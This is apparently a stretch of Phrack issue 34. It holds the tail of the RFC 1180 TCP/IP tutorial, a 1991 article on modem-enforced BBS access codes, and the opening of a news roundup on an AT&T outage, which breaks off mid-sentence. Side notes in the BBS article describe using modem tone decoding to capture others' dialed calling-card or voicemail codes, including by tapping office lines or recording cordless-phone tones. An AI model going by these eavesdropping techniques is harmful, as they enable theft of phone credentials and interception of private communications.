--------------------------------------------------------------
|
|||
|
|network direct/indirect flag router interface number|
|
|||
|
--------------------------------------------------------------
|
|||
|
|development direct <blank> 1 |
|
|||
|
--------------------------------------------------------------
|
|||
|
TABLE 8. Example Simple Route Table
|
|||
|
|
|||
|
This view can be seen on some UNIX systems with the "netstat -r"
|
|||
|
command. With this simple network, all computers have identical
|
|||
|
routing tables.
|
|||
|
|
|||
|
For discussion, the table is printed again without the network number
|
|||
|
translated to its network name.
|
|||
|
|
|||
|
--------------------------------------------------------------
|
|||
|
|network direct/indirect flag router interface number|
|
|||
|
--------------------------------------------------------------
|
|||
|
|223.1.2 direct <blank> 1 |
|
|||
|
--------------------------------------------------------------
|
|||
|
TABLE 9. Example Simple Route Table with Numbers
|
|||
|
|
|||
|
5.8 Direct Scenario
|
|||
|
|
|||
|
Alpha is sending an IP packet to beta. The IP packet is in alpha's
|
|||
|
IP module and the destination IP address is beta or 223.1.2.2. IP
|
|||
|
extracts the network portion of this IP address and scans the first
|
|||
|
column of the table looking for a match. With this network a match
|
|||
|
is found on the first entry.
|
|||
|
|
|||
|
The other information in this entry indicates that computers on this
|
|||
|
network can be reached directly through interface number 1. An ARP
|
|||
|
table translation is done on beta's IP address then the Ethernet
|
|||
|
frame is sent directly to beta via interface number 1.
|
|||
|
|
|||
|
If an application tries to send data to an IP address that is not on
|
|||
|
the development network, IP will be unable to find a match in the
|
|||
|
route table. IP then discards the IP packet. Some computers provide
|
|||
|
a "Network not reachable" error message.
|
|||
|
|
|||
|
5.9 Indirect Routing Details
|
|||
|
|
|||
|
Now, let's take a closer look at the more complicated routing
|
|||
|
scenario that we examined previously.
|
|||
|
|
|||
|
--------- --------- ---------
|
|||
|
| alpha | | delta | |epsilon|
|
|||
|
| 1 | |1 2 3| | 1 |
|
|||
|
--------- --------- ---------
|
|||
|
| | | | |
|
|||
|
--------o---------------o- | -o----------------o--------
|
|||
|
Ethernet 1 | Ethernet 2
|
|||
|
IP network "Development" | IP network "accounting"
|
|||
|
|
|
|||
|
| --------
|
|||
|
| | iota |
|
|||
|
| | 1 |
|
|||
|
| --------
|
|||
|
| |
|
|||
|
--o--------o--------
|
|||
|
Ethernet 3
|
|||
|
IP network "factory"
|
|||
|
|
|||
|
Figure 9. Close-up View of Three IP Networks
|
|||
|
|
|||
|
The route table inside alpha looks like this:
|
|||
|
|
|||
|
---------------------------------------------------------------------
|
|||
|
|network direct/indirect flag router interface number|
|
|||
|
---------------------------------------------------------------------
|
|||
|
|development direct <blank> 1 |
|
|||
|
|accounting indirect devnetrouter 1 |
|
|||
|
|factory indirect devnetrouter 1 |
|
|||
|
--------------------------------------------------------------------
|
|||
|
TABLE 10. Alpha Route Table
|
|||
|
|
|||
|
For discussion the table is printed again using numbers instead of
|
|||
|
names.
|
|||
|
|
|||
|
--------------------------------------------------------------------
|
|||
|
|network direct/indirect flag router interface number|
|
|||
|
--------------------------------------------------------------------
|
|||
|
|223.1.2 direct <blank> 1 |
|
|||
|
|223.1.3 indirect 223.1.2.4 1 |
|
|||
|
|223.1.4 indirect 223.1.2.4 1 |
|
|||
|
--------------------------------------------------------------------
|
|||
|
TABLE 11. Alpha Route Table with Numbers
|
|||
|
|
|||
|
The router in Alpha's route table is the IP address of delta's
|
|||
|
connection to the development network.
|
|||
|
|
|||
|
5.10 Indirect Scenario
|
|||
|
|
|||
|
Alpha is sending an IP packet to epsilon. The IP packet is in
|
|||
|
alpha's IP module and the destination IP address is epsilon
|
|||
|
(223.1.3.2). IP extracts th network portion of this IP address
|
|||
|
(223.1.3) and scans the first column of the table looking for a
|
|||
|
match. A match is found on the second entry.
|
|||
|
|
|||
|
This entry indicates that computers on the 223.1.3 network can be
|
|||
|
reached through the IP-router devnetrouter. Alpha's IP module then
|
|||
|
does an ARP table translation for devnetrouter's IP address and sends
|
|||
|
the IP packet directly to devnetrouter through Alpha's interface
|
|||
|
number 1. The IP packet still contains the destination address of
|
|||
|
epsilon.
|
|||
|
|
|||
|
The IP packet arrives at delta's development network interface and is
|
|||
|
passed up to delta's IP module. The destination IP address is
|
|||
|
examined and because it does not match any of delta's own IP
|
|||
|
addresses, delta decides to forward the IP packet.
|
|||
|
|
|||
|
Delta's IP module extracts the network portion of the destination IP
|
|||
|
address (223.1.3) and scans its route table for a matching network
|
|||
|
field. Delta's route table looks like this:
|
|||
|
|
|||
|
----------------------------------------------------------------------
|
|||
|
|network direct/indirect flag router interface number|
|
|||
|
----------------------------------------------------------------------
|
|||
|
|development direct <blank> 1 |
|
|||
|
|factory direct <blank> 3 |
|
|||
|
|accounting direct <blank> 2 |
|
|||
|
----------------------------------------------------------------------
|
|||
|
TABLE 12. Delta's Route Table
|
|||
|
|
|||
|
Below is delta's table printed again, without the translation to
|
|||
|
names.
|
|||
|
|
|||
|
----------------------------------------------------------------------
|
|||
|
|network direct/indirect flag router interface number|
|
|||
|
----------------------------------------------------------------------
|
|||
|
|223.1.2 direct <blank> 1 |
|
|||
|
|223.1.3 direct <blank> 3 |
|
|||
|
|223.1.4 direct <blank> 2 |
|
|||
|
----------------------------------------------------------------------
|
|||
|
TABLE 13. Delta's Route Table with Numbers
|
|||
|
|
|||
|
The match is found on the second entry. IP then sends the IP packet
|
|||
|
directly to epsilon through interface number 3. The IP packet
|
|||
|
contains the IP destination address of epsilon and the Ethernet
|
|||
|
destination address of epsilon.
|
|||
|
|
|||
|
The IP packet arrives at epsilon and is passed up to epsilon's IP
|
|||
|
module. The destination IP address is examined and found to match
|
|||
|
with epsilon's IP address, so the IP packet is passed to the upper
|
|||
|
protocol layer.
|
|||
|
|
|||
|
5.11 Routing Summary
|
|||
|
|
|||
|
When a IP packet travels through a large internet it may go through
|
|||
|
many IP-routers before it reaches its destination. The path it takes
|
|||
|
is not determined by a central source but is a result of consulting
|
|||
|
each of the routing tables used in the journey. Each computer
|
|||
|
defines only the next hop in the journey and relies on that computer
|
|||
|
to send the IP packet on its way.
|
|||
|
|
|||
|
5.12 Managing the Routes
|
|||
|
|
|||
|
Maintaining correct routing tables on all computers in a large
|
|||
|
internet is a difficult task; network configuration is being modified
|
|||
|
constantly by the network managers to meet changing needs. Mistakes
|
|||
|
in routing tables can block communication in ways that are
|
|||
|
excruciatingly tedious to diagnose.
|
|||
|
|
|||
|
Keeping a simple network configuration goes a long way towards making
|
|||
|
a reliable internet. For instance, the most straightforward method
|
|||
|
of assigning IP networks to Ethernet is to assign a single IP network
|
|||
|
number to each Ethernet.
|
|||
|
|
|||
|
Help is also available from certain protocols and network
|
|||
|
applications. ICMP (Internet Control Message Protocol) can report
|
|||
|
some routing problems. For small networks the route table is filled
|
|||
|
manually on each computer by the network administrator. For larger
|
|||
|
networks the network administrator automates this manual operation
|
|||
|
with a routing protocol to distribute routes throughout a network.
|
|||
|
|
|||
|
When a computer is moved from one IP network to another, its IP
|
|||
|
address must change. When a computer is removed from an IP network
|
|||
|
its old address becomes invalid. These changes require frequent
|
|||
|
updates to the "hosts" file. This flat file can become difficult to
|
|||
|
maintain for even medium-size networks. The Domain Name System helps
|
|||
|
solve these problems.
|
|||
|
|
|||
|
6. User Datagram Protocol
|
|||
|
|
|||
|
UDP is one of the two main protocols to reside on top of IP. It
|
|||
|
offers service to the user's network applications. Example network
|
|||
|
applications that use UDP are: Network File System (NFS) and Simple
|
|||
|
Network Management Protocol (SNMP). The service is little more than
|
|||
|
an interface to IP.
|
|||
|
|
|||
|
UDP is a connectionless datagram delivery service that does not
|
|||
|
guarantee delivery. UDP does not maintain an end-to-end connection
|
|||
|
with the remote UDP module; it merely pushes the datagram out on the
|
|||
|
net and accepts incoming datagrams off the net.
|
|||
|
|
|||
|
UDP adds two values to what is provided by IP. One is the
|
|||
|
multiplexing of information between applications based on port
|
|||
|
number. The other is a checksum to check the integrity of the data.
|
|||
|
|
|||
|
6.1 Ports
|
|||
|
|
|||
|
How does a client on one computer reach the server on another?
|
|||
|
|
|||
|
The path of communication between an application and UDP is through
|
|||
|
UDP ports. These ports are numbered, beginning with zero. An
|
|||
|
application that is offering service (the server) waits for messages
|
|||
|
to come in on a specific port dedicated to that service. The server
|
|||
|
waits patiently for any client to request service.
|
|||
|
|
|||
|
For instance, the SNMP server, called an SNMP agent, always waits on
|
|||
|
port 161. There can be only one SNMP agent per computer because
|
|||
|
there is only one UDP port number 161. This port number is well
|
|||
|
known; it is a fixed number, an internet assigned number. If an SNMP
|
|||
|
client wants service, it sends its request to port number 161 of UDP
|
|||
|
on the destination computer.
|
|||
|
|
|||
|
When an application sends data out through UDP it arrives at the far
|
|||
|
end as a single unit. For example, if an application does 5 writes
|
|||
|
to the UDP port, the application at the far end will do 5 reads from
|
|||
|
the UDP port. Also, the size of each write matches the size of each
|
|||
|
read.
|
|||
|
|
|||
|
UDP preserves the message boundary defined by the application. It
|
|||
|
never joins two application messages together, or divides a single
|
|||
|
application message into parts.
|
|||
|
|
|||
|
6.2 Checksum
|
|||
|
|
|||
|
An incoming IP packet with an IP header type field indicating "UDP"
|
|||
|
is passed up to the UDP module by IP. When the UDP module receives
|
|||
|
the UDP datagram from IP it examines the UDP checksum. If the
|
|||
|
checksum is zero, it means that checksum was not calculated by the
|
|||
|
sender and can be ignored. Thus the sending computer's UDP module
|
|||
|
may or may not generate checksums. If Ethernet is the only network
|
|||
|
between the 2 UDP modules communicating, then you may not need
|
|||
|
checksumming. However, it is recommended that checksum generation
|
|||
|
always be enabled because at some point in the future a route table
|
|||
|
change may send the data across less reliable media.
|
|||
|
|
|||
|
If the checksum is valid (or zero), the destination port number is
|
|||
|
examined and if an application is bound to that port, an application
|
|||
|
message is queued for the application to read. Otherwise the UDP
|
|||
|
datagram is discarded. If the incoming UDP datagrams arrive faster
|
|||
|
than the application can read them and if the queue fills to a
|
|||
|
maximum value, UDP datagrams are discarded by UDP. UDP will continue
|
|||
|
to discard UDP datagrams until there is space in the queue.
|
|||
|
|
|||
|
7. Transmission Control Protocol
|
|||
|
|
|||
|
TCP provides a different service than UDP. TCP offers a connection-
|
|||
|
oriented byte stream, instead of a connectionless datagram delivery
|
|||
|
service. TCP guarantees delivery, whereas UDP does not.
|
|||
|
|
|||
|
TCP is used by network applications that require guaranteed delivery
|
|||
|
and cannot be bothered with doing time-outs and retransmissions. The
|
|||
|
two most typical network applications that use TCP are File Transfer
|
|||
|
Protocol (FTP) and the TELNET. Other popular TCP network
|
|||
|
applications include X-Window System, rcp (remote copy), and the r-
|
|||
|
series commands. TCP's greater capability is not without cost: it
|
|||
|
requires more CPU and network bandwidth. The internals of the TCP
|
|||
|
module are much more complicated than those in a UDP module.
|
|||
|
|
|||
|
Similar to UDP, network applications connect to TCP ports. Well-
|
|||
|
defined port numbers are dedicated to specific applications. For
|
|||
|
instance, the TELNET server uses port number 23. The TELNET client
|
|||
|
can find the server simply by connecting to port 23 of TCP on the
|
|||
|
specified computer.
|
|||
|
|
|||
|
When the application first starts using TCP, the TCP module on the
|
|||
|
client's computer and the TCP module on the server's computer start
|
|||
|
communicating with each other. These two end-point TCP modules
|
|||
|
contain state information that defines a virtual circuit. This
|
|||
|
virtual circuit consumes resources in both TCP end-points. The
|
|||
|
virtual circuit is full duplex; data can go in both directions
|
|||
|
simultaneously. The application writes data to the TCP port, the
|
|||
|
data traverses the network and is read by the application at the far
|
|||
|
end.
|
|||
|
|
|||
|
As with all sliding window protocols, the protocol has a window size.
|
|||
|
The window size determines the amount of data that can be transmitted
|
|||
|
before an acknowledgement is required. For TCP, this amount is not a
|
|||
|
number of TCP segments but a number of bytes.
|
|||
|
|
|||
|
8. Network Appliations
|
|||
|
|
|||
|
Why do both TCP and UDP exist, instead of just one or the other?
|
|||
|
|
|||
|
They supply different services. Most applications are implemented to
|
|||
|
use only one or the other. You, the programmer, choose the protocol
|
|||
|
that best meets your needs. If you need a reliable stream delivery
|
|||
|
service, TCP might be best. If you need a datagram service, UDP
|
|||
|
might be best. If you need efficiency over long-haul circuits, TCP
|
|||
|
might be best. If you need efficiency over fast networks with short
|
|||
|
latency, UDP might be best. If your needs do not fall nicely into
|
|||
|
these categories, then the "best" choice is unclear. However,
|
|||
|
applications can make up for deficiencies in the choice. For
|
|||
|
instance if you choose UDP and you need reliability, then the
|
|||
|
application must provide reliability. If you choose TCP and you need
|
|||
|
a record oriented service, then the application must insert markers
|
|||
|
in the byte stream to delimit records.
|
|||
|
|
|||
|
What network aplications are available?
|
|||
|
|
|||
|
There are far too many to list. The number is growing continually.
|
|||
|
Some of the applications have existed since the beginning of internet
|
|||
|
technology: TELNET and FTP. Others are relatively new: X-Windows and
|
|||
|
SNMP. The following is a brief description of the applications
|
|||
|
mentioned in this tutorial.
|
|||
|
|
|||
|
8.1 TELNET
|
|||
|
|
|||
|
TELNET provides a remote login capability on TCP. The operation and
|
|||
|
appearance is similar to keyboard dialing through a telephone switch.
|
|||
|
On the command line the user types "telnet delta" and receives a
|
|||
|
login prompt from the computer called "delta".
|
|||
|
|
|||
|
TELNET works well; it is an old application and has widespread
|
|||
|
interoperability. Implementations of TELNET usually work between
|
|||
|
different operating systems. For instance, a TELNET client may be on
|
|||
|
VAX/VMS and the server on UNIX System V.
|
|||
|
|
|||
|
8.2 FTP
|
|||
|
|
|||
|
File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has
|
|||
|
widespread interoperability. The operation and appearance is as if
|
|||
|
you TELNETed to the remote computer. But instead of typing your
|
|||
|
usual commands, you have to make do with a short list of commands for
|
|||
|
directory listings and the like. FTP commands allow you to copy
|
|||
|
files between computers.
|
|||
|
|
|||
|
8.3 rsh
|
|||
|
|
|||
|
Remote shell (rsh or remsh) is one of an entire family of remote UNIX
|
|||
|
style commands. The UNIX copy command, cp, becomes rcp. The UNIX
|
|||
|
"who is logged in" command, who, becomes rwho. The list continues
|
|||
|
and is referred to collectively to as the "r" series commands or the
|
|||
|
"r*" (r star) commands.
|
|||
|
|
|||
|
The r* commands mainly work between UNIX systems and are designed for
|
|||
|
interaction between trusted hosts. Little consideration is given to
|
|||
|
security, but they provide a convenient user environment.
|
|||
|
|
|||
|
To execute the "cc file.c" command on a remote computer called delta,
|
|||
|
type "rsh delta cc file.c". To copy the "file.c" file to delta, type
|
|||
|
"rcp file.c delta:". To login to delta, type "rlogin delta", and if
|
|||
|
you administered the computers in a certain wa, you will not be
|
|||
|
challenged with a password prompt.
|
|||
|
|
|||
|
8.4 NFS
|
|||
|
|
|||
|
Network File System, first developed by Sun Microsystems Inc, uses
|
|||
|
UDP and is excellent for mounting UNIX file systems on multiple
|
|||
|
computers. A diskless workstation can access its server's hard disk
|
|||
|
as if the disk were local to the workstation. A single disk copy of
|
|||
|
a database on mainframe "alpha" can also be used by mainframe "beta"
|
|||
|
if the database's file system is NFS mounted commands to
|
|||
|
use the NFS mounted disk as if it were local disk.
|
|||
|
|
|||
|
8.5 SNMP
|
|||
|
|
|||
|
Simple Network Management Protocol (SNMP) uses UDP and is designed
|
|||
|
for use by central network management stations. It is a well known
|
|||
|
fact that if given enough data, a network manager can detect and
|
|||
|
diagnose network problems. The central station uses SNMP to collect
|
|||
|
this data from other computers on the network. SNMP defines the
|
|||
|
format for the data; it is left to the central station or network
|
|||
|
manager to interpret the data.
|
|||
|
|
|||
|
8.6 X-Window
|
|||
|
|
|||
|
The X Window System uses the X Window protocol on TCP to draw windows
|
|||
|
on a workstation's bitmap display. X Window is much more than a
|
|||
|
utility for drawing windows; it is entire philosophy for designing a
|
|||
|
user interface.
|
|||
|
|
|||
|
9. Other Information
|
|||
|
|
|||
|
Much information about internet technology was not included in this
|
|||
|
tutorial. This section lists information that is considered the next
|
|||
|
level of detail for the reader who wishes to learn more.
|
|||
|
|
|||
|
o administration commands: arp, route, and netstat
|
|||
|
o ARP: permanent entry, publish entry, time-out entry, spoofing
|
|||
|
o IP route table: host entry, default gateway, subnets
|
|||
|
o IP: time-to-live counter, fragmentation, ICMP
|
|||
|
o RIP, routing loops
|
|||
|
o Domain Name System
|
|||
|
|
|||
|
10. References
|
|||
|
|
|||
|
[1] Comer, D., "Internetworking with TCP/IP Principles, Protocols,
|
|||
|
and Architecture", Prentice Hall, Englewood Cliffs, New Jersey,
|
|||
|
U.S.A., 1988.
|
|||
|
|
|||
|
[2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN
|
|||
|
Network Information Center, SRI International, 333 Ravenswood
|
|||
|
Avenue, Room EJ291, Menlow Park, California, U.S.A., 1985.
|
|||
|
|
|||
|
[3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems
|
|||
|
Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.
|
|||
|
|
|||
|
11. Relation to other RFCs
|
|||
|
|
|||
|
This RFC is a tutorial and it does not UPDATE or OBSOLETE any other
|
|||
|
RFC.
|
|||
|
|
|||
|
12. Security Considerations
|
|||
|
|
|||
|
There are security considerations within the TCP/IP protocol suite.
|
|||
|
To some people these considerations are serious problems, to others
|
|||
|
they are not; it depends on the user requirements.
|
|||
|
This tutorial does not discuss these issues, but if you want to learn
|
|||
|
more you should start with the topic of ARP-spoofing, then use the
|
|||
|
"Security Considerations" section of RFC 1122 to lead you to more
|
|||
|
information.
|
|||
|
|
|||
|
13. Authors' Addresses
|
|||
|
|
|||
|
Theodore John Socolofsky
|
|||
|
EMail: TEDS@SPIDER.CO.UK
|
|||
|
|
|||
|
Claudia Jeanne Kale
|
|||
|
EMail: CLAUDIAK@SPIDER.CO.UK
|
|||
|
|
|||
|
Note: This info taken from RFC-1180.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #9 of 11
|
|||
|
|
|||
|
._._._._._._._._._._._._._._._._._._._._._._._._.
|
|||
|
! !
|
|||
|
! Advanced Modem-Oriented BBS Security !
|
|||
|
! !
|
|||
|
! By Laughing Gas and Dead Cow !
|
|||
|
! !
|
|||
|
! Written Exclusively for PHRACK 8/22/91 !
|
|||
|
!_._._._._._._._._._._._._._._._._._._._._._._._!
|
|||
|
|
|||
|
|
|||
|
* Introduction =-= Things you need to know *
|
|||
|
|
|||
|
This is an introduction and guide to setting up your BBS and modem so that a
|
|||
|
caller must know a certain code and append it to his dialing string in order to
|
|||
|
access the BBS. This lets you have yet another way (besides newuser passwords,
|
|||
|
etc) to lock out unwanted callers.
|
|||
|
|
|||
|
You can also set a certain pattern for your board's numerical code based on the
|
|||
|
day or the month or something, and distribute this pattern instead of having to
|
|||
|
distribute the access code.
|
|||
|
You must have an intelligent modem to be able to run a board which requires the
|
|||
|
access method I'm going to be discussing in this file. However you don't need
|
|||
|
an intelligent modem to be able to call the same board, but you do have to
|
|||
|
enter the code manually if you do not have an intelligent modem. (So only
|
|||
|
certain people can run a board with this method of access control, but >almost<
|
|||
|
anyone can call one.)
|
|||
|
|
|||
|
All modem commands in this manual will be hayes 'AT' style commands, and some
|
|||
|
may be available only to USRobotics Courier modems with v.42bis, or certain
|
|||
|
other intelligent modems. If you can't get it to work with your modem, your
|
|||
|
modem may not be able to do it, but try looking in your modem manual, just in
|
|||
|
case.
|
|||
|
|
|||
|
NOTE: The ONLY modem that this method has been tested with is a USRobotics
|
|||
|
Courier HST modem, (the new kind) with the v.42bis. I tested it with my modem
|
|||
|
which is an older HST (14.4, but no v.42bis) and it did NOT accept the AT%T
|
|||
|
command (it returned "ERROR"). Check page 83 of your HST manual for more info,
|
|||
|
or type AT%$ for on-line help from the modem firmware. (about as helpful as the
|
|||
|
manual, and neither are very detailed.)
|
|||
|
|
|||
|
Things to know:
|
|||
|
ATDT1234567; This command causes your modem to dial 1234567 and
|
|||
|
then return to command mode.
|
|||
|
ATDT1234567@1; This command causes your modem to dial 1234567, wait for
|
|||
|
an answer, dial 1 and return to command mode.
|
|||
|
|-----> AT%T This command causes every tone that goes into the modem
|
|||
|
| to be identified and followed with a 0.
|
|||
|
|
|
|||
|
|---------------------- This is the key to the whole enchilada.
|
|||
|
|
|||
|
Alternate commands may be available depending on your modem type.
|
|||
|
|
|||
|
* Concept =-= How-To
|
|||
|
|
|||
|
The concept for the bbs access code would be as follows.
|
|||
|
|
|||
|
The caller dials the number to the BBS, when the BBS picks up, it sends a
|
|||
|
digit, then the caller sends a responding set of digits. If the digits which
|
|||
|
the caller sends match the access code for the BBS, the BBS will send an answer
|
|||
|
tone and the caller's modem will acknowledge and connection.
|
|||
|
|
|||
|
How it works is like this:
|
|||
|
(Sample Transcript)
|
|||
|
|
|||
|
CALLER> ATDT1234567@234
|
|||
|
BBS> RING
|
|||
|
BBS> ATDT1;
|
|||
|
BBS> OK
|
|||
|
BBS> AT%T
|
|||
|
BBS> 203040
|
|||
|
BBS> ATA
|
|||
|
|
|||
|
What happens is the caller dials 1234567 (the number of the BBS) the '@' tells
|
|||
|
the callers modem to wait for a result (which is received when the BBS gets a
|
|||
|
ring and sends a 1) then the callers modem dials 234 (the access code) after
|
|||
|
|
|||
|
the BBS sent the '1' it got a OK so it sent a AT%T which told it to monitor
|
|||
|
tones. This command returned "203040" which is 234 followed by 0's (the format
|
|||
|
of the output of AT%T) the BBS software would have to watch for this string.
|
|||
|
Since 234 was the right code, the board sent an ATA which would connect the
|
|||
|
caller since it's dial command was still open. If 234 hadn't been the code,
|
|||
|
then the BBS would have sent a ATH0.
|
|||
|
|
|||
|
* Manual Dialing =-= Lame modems *
|
|||
|
|
|||
|
Anyway, if you don't have a modem that does the AT%T or ATDT1; commands you
|
|||
|
CANNOT run a BBS with this type of security, unless your modem has EQUIVALENT
|
|||
|
commands, or you can figure out a way to do it with the commands your modem
|
|||
|
has. The toughest part is the reading of tones, which, as far as I know, is
|
|||
|
unique to the HST/Courier modems.
|
|||
|
|
|||
|
However, if your modem does not do the ATDT1@1 thing, then you can PROBABLY
|
|||
|
still call a board using this security. This is assuming you can just send a
|
|||
|
"dial command" to your modem without a number (ie ATD on an HST.) What you do
|
|||
|
is dial the BBS number manually, then you'll here a beep, you dial the code,
|
|||
|
then send the dial command to your modem and put the phone down. This should
|
|||
|
connect you in the same fashion.. (ie..)
|
|||
|
|
|||
|
CALLER> manually dials BBS
|
|||
|
BBS> ATDT1;
|
|||
|
CALLER> hears beep and dials 234, then sends ATD to his modem and puts the
|
|||
|
phone down.
|
|||
|
BBS> OK
|
|||
|
BBS> AT%T
|
|||
|
BBS> 203040
|
|||
|
BBS> ATA
|
|||
|
CALLER> his modem connects.
|
|||
|
|
|||
|
* Bells and Whistles =-= Wrapping It Up *
|
|||
|
|
|||
|
Your options when using this type of security. There are many different things
|
|||
|
you can do.
|
|||
|
|
|||
|
Method #1: You can say "Hey, the access code for my board is 234" and give
|
|||
|
that to the people you want to call.
|
|||
|
|
|||
|
Method #2: Set a pattern for your access codes. Say, the date (ie, for today,
|
|||
|
8-22-91 the code would be 082291), or you could get more complex (add one to
|
|||
|
each digit, run it through an algorithm, etc)
|
|||
|
|
|||
|
Method #3: Distribute a program that generates the code based on the day, the
|
|||
|
month, what have you. (However this is only a solution if you can either
|
|||
|
distribute a program like this to EVERY type of operating system, or you only
|
|||
|
want callers from one operating system (or several, the only ones you can
|
|||
|
produce it for..)
|
|||
|
|
|||
|
Method #4: Have the BBS accept several codes, and give out different code to
|
|||
|
each class of users (say, newusers to apply = 1234, validated = 2345, elite =
|
|||
|
3456) or something like that, this would allow for control of who calls when,
|
|||
|
as well as logging of call class frequency, etc.
|
|||
|
|
|||
|
Method #5: Have a specific code for each user. This would take a lot of
|
|||
|
maintenance, but would provide for a VERY secure BBS environment. This would
|
|||
|
allow the same advantages above as well (logging, freq. etc).
|
|||
|
|
|||
|
Things to keep in mind however are if you have an access code generated by a
|
|||
|
program or by the date, etc. you have to change the code whenever the program
|
|||
|
would.
|
|||
|
|
|||
|
An interesting side note here is that the AT%T command can be used to call a
|
|||
|
COCOT (private payfone) and record the tones, or possibly to record codes other
|
|||
|
people entered, etc. (Ie, bring your laptop with modem to a office, attach
|
|||
|
it to an extension and wait for a person to pick up, issue the ATD; command
|
|||
|
right away, then AT%T command. If the person dials a 950, you should get
|
|||
|
something like
|
|||
|
|
|||
|
90500010003030 (pause) 203040506070
|
|||
|
|
|||
|
that is assuming the code is 234567. Congratulations, you now have their code.
|
|||
|
The modem can recognize the dtmf tones for 0-9, *, #, and the silver box tones
|
|||
|
A, B, C, and E. I'm sure other interesting uses for this feature can be
|
|||
|
found, and I'd love to hear from the other people out there in the h/p world.
|
|||
|
I'm sure a lot of you have seen me around, for those that haven't I can be
|
|||
|
reached on my board, Solsbury Hill or Ripco (312) or on Internet as
|
|||
|
lgas@doomsday.spies.com.
|
|||
|
|
|||
|
(Note: Spies is down as of this writing, I have some other accounts, but I'd
|
|||
|
prefer that most of them remain unknown... if anyone wants to offer me an
|
|||
|
account I can use just for mail where I can have my alias for the account
|
|||
|
name, on a stable system, please contact me.)
|
|||
|
|
|||
|
|
|||
|
* Non-BBS Oriented Stuff =-= Conclusion *
|
|||
|
|
|||
|
In some issue of 2600 magazine someplace at some time they published an article
|
|||
|
on how to build a tone detection device: Now you have your own, built in to the
|
|||
|
modem.
|
|||
|
|
|||
|
An example application of this "in the field" would be calling a COCOT and
|
|||
|
using the modem to decipher the tones. That would be done:
|
|||
|
|
|||
|
ATDT3014283268; ;call the COCOT
|
|||
|
AT%T ;get tones
|
|||
|
|
|||
|
it should respond with the decoded tones.
|
|||
|
|
|||
|
You could fool around with it and get it to accept input from a tape recorder,
|
|||
|
this gives you a way to decipher recorded VMB passcodes, or phone numbers, or
|
|||
|
anything else that was recorded as it was dialed. Or use it with a radio
|
|||
|
scanner set to scan the freqs that cordless fones operate on, and record those
|
|||
|
tones. Then play 'em back into the modem and they're yours.
|
|||
|
|
|||
|
In conclusion... (ahem).. This is an area which I believe has never been
|
|||
|
breached before, and this idea was brought to you by THUGS. As long as
|
|||
|
technology keeps advancing, we'll be here to bring you the latest tricks such
|
|||
|
as this one. Please contact me if you have any information about this area
|
|||
|
(tone detection via modem, or anything relating to it at all..) especially if
|
|||
|
you know of modems besides the v.42bis models of USRobotic's HSTs that can do
|
|||
|
this.
|
|||
|
|
|||
|
Laughing Gas
|
|||
|
Solsbury Hill BBS (301-428-3268)
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-Four, File #10 of 11
|
|||
|
|
|||
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|||
|
PWN PWN
|
|||
|
PWN Phrack World News PWN
|
|||
|
PWN PWN
|
|||
|
PWN Issue XXXIV / Part One PWN
|
|||
|
PWN PWN
|
|||
|
PWN Compiled by Dispater PWN
|
|||
|
PWN PWN
|
|||
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|||
|
|
|||
|
|
|||
|
What We Have Got Here Today is Failure to Communicate
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Editors Comment: Dispater
|
|||
|
|
|||
|
With hundreds, maybe thousands of lives at stake, three airports in New
|
|||
|
York had to shut down due to a long distance carrier failing. It is absolutely
|
|||
|
amazing how irresponsible these services were to rely on only on form of
|
|||
|
communication. Where was the back up system? This incident might not have
|
|||
|
happened it they would have had an alternative carrier or something as simple
|
|||
|
as two way radios.
|
|||
|
|
|||
|
Many people are running around these days screaming about how
|
|||
|
irresponsible AT&T was. The real problem lyes with people in our society
|
|||
|
failing to take the time to learn fundamental aspects of the common technology.
|
|||
|
|
|||
|
It is also a shame that the people "in control" were incapable of using
|
|||
|
something as simple as a "port" to dial through another extender. This
|
|||
|
is the kind of thing that happens when people choose to isolate themselves
|
|||
|
from the technological society we have today.
|
|||
|
|
|||
|
What follows is a compilation of several articles dealing with AT&T long
|
|||
|
distance carrier failures.
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
Thank You for abUsing AT&T October 18, 1991
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Kimberly Hayes Taylor and Steve Marshall (USA Today "Phone Failure Stalls
|
|||
|
Air Traffic Disruption in N.Y. Felt Nationwide")
|
|||
|
|
|||
|
Air traffic in and out of New York City resumed late Tuesday after a
|
|||
|
phone-service failure virtually shut down three airports for almost four
|
|||
|
hours. Hundreds of flights coast to coast were delayed or canceled when
|
|||
|
controllers at John F. Kennedy, La Guardia and Newark (New Jersey) airports
|
|||
|
lost the link that allows communication among themselves or with other U.S.
|
|||
|
airports. Communications between pilots and air-traffic controllers travel
|
|||
|
over telephone lines to ground-based radio equipment. AT&T spokesman Herb
|
|||
|
Linnen blamed an internal power failure in a long-distance switching office
|
|||
|
in Manhattan. Hours after the 4:50 PM EDT failure, 40 planes loaded with
|
|||
|
passengers were sitting on the runway at Kennedy, 35 at Newark, 30 at La
|
|||
|
Guardia. "During the height of the thing, at least 300 aircraft were delayed
|
|||
|
at metropolitan airports," said Bob Fulton, a spokesperson for the Federal
|
|||
|
Aviation Administration. Included: flights taking off "from California to
|
|||
|
Florida" and headed for New York, said FAA's Fred Farrar. Farrar said planes
|
|||
|
had to be grounded for safety. Without telephone communication, they would
|
|||
|
"fly willy-nilly." Among diverted flights: a British Airways supersonic
|
|||
|
Concorde from London, which landed at Bradley airport outside Hartford, Conn.
|
|||
|
Passenger reaction: at Washington's National Airport, Dominique Becoeur of
|
|||
|
Paris was "reading, drinking, and thinking" while waiting for a flight to New
|
|||
|
York. At La Guardia, Ernie Baugh, of Chattanooga, Tenn., said, "I think I
|
|||
|
